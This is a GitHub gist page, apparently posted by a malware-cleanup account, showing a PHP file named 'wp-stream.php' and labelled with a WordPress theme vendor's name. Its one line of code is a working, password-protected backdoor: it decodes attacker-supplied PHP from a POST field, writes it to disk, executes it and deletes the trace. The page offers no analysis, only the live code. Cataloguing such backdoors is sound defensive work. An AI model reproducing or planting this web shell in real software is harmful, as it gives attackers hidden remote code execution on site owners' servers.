-
-
Save magefix/a2fba9e4df788a1f7fffdb2ae45f3626 to your computer and use it in GitHub Desktop.
wp-stream.php ( Thrive Themes )
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php if(isset($_POST['lt']) && md5($_POST['lt']) == base64_decode("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) {$lt = base64_decode($_POST['a']);file_put_contents('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);}} ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment